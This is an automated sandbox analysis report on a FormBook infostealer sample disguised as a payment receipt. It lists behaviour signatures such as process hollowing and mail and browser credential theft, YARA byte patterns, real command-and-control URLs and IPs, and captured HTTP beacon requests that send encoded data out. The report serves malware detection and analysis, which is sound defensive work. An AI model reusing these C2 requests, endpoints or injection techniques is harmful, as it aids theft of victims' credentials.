Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
payment_copy2_receipt.exe

Overview

General Information

Sample Name:payment_copy2_receipt.exe
Analysis ID:756109
MD5:9b8c61ded729ca6c9d5f7fded18eef27
SHA1:37fc137e9aa09fc01820cd90c851ca3aee6be72a
SHA256:c1609447bd7a2ee528d1f2145ebc3ad9a53efee61111824d22f935e497bac31f
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Performs DNS queries to domains with low reputation
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • payment_copy2_receipt.exe (PID: 6116 cmdline: C:\Users\user\Desktop\payment_copy2_receipt.exe MD5: 9B8C61DED729CA6C9D5F7FDED18EEF27)
    • fcvvthv.exe (PID: 6108 cmdline: "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q MD5: 353F7D8845E3DD77D50661A00EC7DF55)
      • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • fcvvthv.exe (PID: 2828 cmdline: "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q MD5: 353F7D8845E3DD77D50661A00EC7DF55)
        • explorer.exe (PID: 3320 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • msdt.exe (PID: 5440 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.projectlis.online/veh0/"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x100d0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x8e07:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c05:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x86b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x8d07:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x8e7f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x78fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xee47:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xfe3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0xb119:$sqlite3step: 68 34 1C 7B E1
    • 0xbc91:$sqlite3step: 68 34 1C 7B E1
    • 0xb15b:$sqlite3text: 68 38 2A 90 C5
    • 0xbcd6:$sqlite3text: 68 38 2A 90 C5
    • 0xb172:$sqlite3blob: 68 53 D8 7F 8C
    • 0xbcec:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 29 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.fcvvthv.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.fcvvthv.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x6f48:$a1: 3C 30 50 4F 53 54 74 09 40
        • 0x1fa07:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0xb206:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        • 0x1873e:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
        3.2.fcvvthv.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x1853c:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x17fe8:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x1863e:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x187b6:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xadd1:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x17233:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1e77e:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1f771:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.fcvvthv.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x1aa50:$sqlite3step: 68 34 1C 7B E1
        • 0x1b5c8:$sqlite3step: 68 34 1C 7B E1
        • 0x1aa92:$sqlite3text: 68 38 2A 90 C5
        • 0x1b60d:$sqlite3text: 68 38 2A 90 C5
        • 0x1aaa9:$sqlite3blob: 68 53 D8 7F 8C
        • 0x1b623:$sqlite3blob: 68 53 D8 7F 8C
        3.2.fcvvthv.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          Click to see the 3 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for submitted file
          Source: payment_copy2_receipt.exeReversingLabs: Detection: 53%
          Source: payment_copy2_receipt.exeVirustotal: Detection: 38%Perma Link
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.bem4u.shop/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+vAvira URL Cloud: Label: malware
          Source: http://www.030332.com/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJTAvira URL Cloud: Label: malware
          Source: http://www.vnsuda.lol/veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDsAvira URL Cloud: Label: malware
          Source: https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYVAvira URL Cloud: Label: malware
          Source: http://www.stephapproved.com/veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDsAvira URL Cloud: Label: malware
          Source: http://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sMAvira URL Cloud: Label: malware
          Source: http://www.bem4u.shop/veh0/Avira URL Cloud: Label: malware
          Source: http://www.vnsuda.lol/veh0/Avira URL Cloud: Label: malware
          Source: http://www.coolfashionshop.xyz/veh0/Avira URL Cloud: Label: malware
          Source: www.projectlis.online/veh0/Avira URL Cloud: Label: malware
          Source: http://www.stephapproved.com/veh0/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeReversingLabs: Detection: 53%
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeJoe Sandbox ML: detected
          Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.projectlis.online/veh0/"]}
          Source: payment_copy2_receipt.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: Binary string: msdt.pdbGCTL source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: fcvvthv.exe, 00000001.00000003.253544929.0000000002620000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000001.00000003.245524728.0000000002780000.00000004.00001000.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: fcvvthv.exe, fcvvthv.exe, 00000003.00000003.257319352.0000000000896000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.255559001.00000000005F7000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.360183662.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000002.362321269.0000000000B4F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.513574094.0000000004C2F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.362154856.000000000497D000.00000004.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.512407542.0000000004B10000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.359598987.00000000047BA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: fcvvthv.exe, 00000003.00000002.365908919.0000000002A40000.00000040.10000000.00040000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.355203577.0000000002BC2000.00000004.00000800.00020000.00000000.sdmp, fcvvthv.exe, 00000003.00000003.353436510.0000000002A4A000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00405620 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00405FF6 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_00402654 FindFirstFileA,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_00410290 FindFirstFileExW,

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.bem4u.shop
          Source: C:\Windows\explorer.exeDomain query: www.030332.com
          Source: C:\Windows\explorer.exeDomain query: www.vnsuda.lol
          Source: C:\Windows\explorer.exeDomain query: www.stephapproved.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.115.196 80
          Source: C:\Windows\explorer.exeNetwork Connect: 70.32.23.81 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.110.163.134 80
          Source: C:\Windows\explorer.exeDomain query: www.coolfashionshop.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 103.100.208.243 80
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.coolfashionshop.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.projectlis.online/veh0/
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: A2HOSTINGUS A2HOSTINGUS
          Source: global trafficHTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT HTTP/1.1Host: www.030332.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs HTTP/1.1Host: www.vnsuda.lolConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM HTTP/1.1Host: www.coolfashionshop.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs HTTP/1.1Host: www.stephapproved.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v HTTP/1.1Host: www.bem4u.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 75.2.115.196 75.2.115.196
          Source: global trafficHTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.vnsuda.lolConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.vnsuda.lolUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.vnsuda.lol/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 4b 32 42 42 6a 5a 7a 71 4b 58 57 37 35 67 6e 36 64 57 51 6c 39 6a 32 4e 47 6b 69 45 36 63 5a 30 37 62 67 68 75 70 7e 58 75 58 6d 74 4f 46 75 5f 68 4b 63 32 75 74 38 49 53 62 49 52 53 57 33 32 4e 4f 77 45 79 31 63 4e 62 44 31 39 49 43 30 52 58 72 68 49 51 47 6e 74 6d 62 56 4d 55 2d 61 77 28 78 78 39 76 44 4e 31 55 6b 33 77 4c 67 55 61 31 75 4f 38 49 63 7e 5a 36 74 6e 46 28 6f 4f 71 42 4e 78 6c 69 61 51 72 37 72 7a 66 78 49 52 66 46 5a 4a 77 64 4b 37 67 70 52 6b 74 4b 4b 61 71 56 2d 70 7a 6f 32 74 4d 45 77 7a 64 28 37 34 41 48 76 50 48 79 6f 45 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=K2BBjZzqKXW75gn6dWQl9j2NGkiE6cZ07bghup~XuXmtOFu_hKc2ut8ISbIRSW32NOwEy1cNbD19IC0RXrhIQGntmbVMU-aw(xx9vDN1Uk3wLgUa1uO8Ic~Z6tnF(oOqBNxliaQr7rzfxIRfFZJwdK7gpRktKKaqV-pzo2tMEwzd(74AHvPHyoE.
          Source: global trafficHTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.coolfashionshop.xyzConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.coolfashionshop.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.coolfashionshop.xyz/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 77 31 6a 53 66 6c 50 65 73 73 61 7a 5a 66 69 68 42 6d 51 35 54 76 5a 57 33 71 4c 52 53 35 68 59 57 59 59 4f 4c 52 63 73 51 79 37 5f 6c 34 6b 79 5a 63 4f 6e 28 32 62 43 6f 4b 77 61 59 67 53 57 55 67 79 58 28 79 76 69 43 67 45 48 6f 36 47 43 47 58 5a 44 61 72 34 47 56 6f 59 72 66 49 47 58 4a 59 68 67 54 57 37 4d 68 7a 34 45 63 4f 55 69 68 6c 4d 57 65 79 71 32 76 38 30 53 45 61 57 56 4d 36 48 5f 32 65 79 48 44 63 54 37 6c 58 62 4c 51 62 47 63 56 4a 73 62 48 62 55 5f 6d 4a 7a 63 46 53 61 6e 71 4b 78 48 48 4f 4f 36 62 37 53 52 6a 72 6e 55 42 58 41 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=w1jSflPessazZfihBmQ5TvZW3qLRS5hYWYYOLRcsQy7_l4kyZcOn(2bCoKwaYgSWUgyX(yviCgEHo6GCGXZDar4GVoYrfIGXJYhgTW7Mhz4EcOUihlMWeyq2v80SEaWVM6H_2eyHDcT7lXbLQbGcVJsbHbU_mJzcFSanqKxHHOO6b7SRjrnUBXA.
          Source: global trafficHTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.stephapproved.comConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.stephapproved.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.stephapproved.com/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 6e 30 71 45 73 54 75 6c 54 70 55 72 39 6e 32 7a 50 65 55 67 75 34 77 6a 64 76 46 61 4e 57 6a 6f 43 35 39 65 48 58 64 6f 34 78 47 61 67 36 4e 54 71 32 55 6a 63 70 33 4d 4c 64 4b 46 5a 69 6d 54 77 34 34 37 36 31 62 32 56 70 6c 30 49 77 73 51 66 64 54 56 42 6d 4f 7a 6b 4a 79 36 71 56 47 51 6a 6a 55 41 32 61 6a 35 67 37 39 47 70 35 6d 33 62 44 43 51 79 76 38 33 50 46 7a 54 45 64 79 46 77 48 61 71 37 4b 33 36 64 6c 4f 4f 52 32 79 6c 4d 4f 4e 51 76 30 36 6e 66 32 7e 69 35 77 28 75 7a 5a 37 72 76 65 7e 5a 31 62 63 4d 52 35 61 66 49 34 62 53 30 35 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=n0qEsTulTpUr9n2zPeUgu4wjdvFaNWjoC59eHXdo4xGag6NTq2Ujcp3MLdKFZimTw44761b2Vpl0IwsQfdTVBmOzkJy6qVGQjjUA2aj5g79Gp5m3bDCQyv83PFzTEdyFwHaq7K36dlOOR2ylMONQv06nf2~i5w(uzZ7rve~Z1bcMR5afI4bS05M.
          Source: global trafficHTTP traffic detected: POST /veh0/ HTTP/1.1Host: www.bem4u.shopConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.bem4u.shopUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.bem4u.shop/veh0/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 56 38 4f 6c 71 3d 31 42 57 76 56 6a 72 61 46 2d 73 54 64 48 28 39 47 73 38 53 58 7a 35 54 62 53 39 65 4e 45 79 4b 4e 46 48 6b 47 62 55 6b 52 59 50 49 6a 4f 33 72 37 33 74 73 66 42 65 62 6c 5f 75 66 67 32 44 5a 4f 38 50 69 69 6a 6b 36 44 36 68 73 4f 46 4d 63 6e 2d 4a 70 32 77 62 36 61 4b 48 58 49 71 37 37 55 6d 5a 41 78 37 6b 5a 28 65 44 52 75 2d 66 2d 4b 35 4a 53 44 30 49 56 47 66 30 38 67 4e 67 33 69 31 56 4c 45 50 42 61 6c 4d 48 63 30 66 74 6a 4c 33 49 79 69 38 77 41 6a 56 42 4f 52 6c 76 65 46 78 59 41 57 52 65 75 58 79 36 62 6d 64 56 4f 65 44 44 77 4a 79 77 2e 00 00 00 00 00 00 00 00 Data Ascii: V8Olq=1BWvVjraF-sTdH(9Gs8SXz5TbS9eNEyKNFHkGbUkRYPIjO3r73tsfBebl_ufg2DZO8Piijk6D6hsOFMcn-Jp2wb6aKHXIq77UmZAx7kZ(eDRu-f-K5JSD0IVGf08gNg3i1VLEPBalMHc0ftjL3Iyi8wAjVBORlveFxYAWReuXy6bmdVOeDDwJyw.
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 15:42:38 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 29 Nov 2022 15:43:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeServer: nginxVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 56 70 cb 2f 4a ca 4c 49 49 cd b3 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 6d 78 95 8e 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6b(HML),I310Vp/JLII&T$dCAfAyyyr0.mx0
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 29 Nov 2022 15:43:42 GMTContent-Type: text/htmlContent-Length: 146Connection: closeServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Nov 2022 15:44:03 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
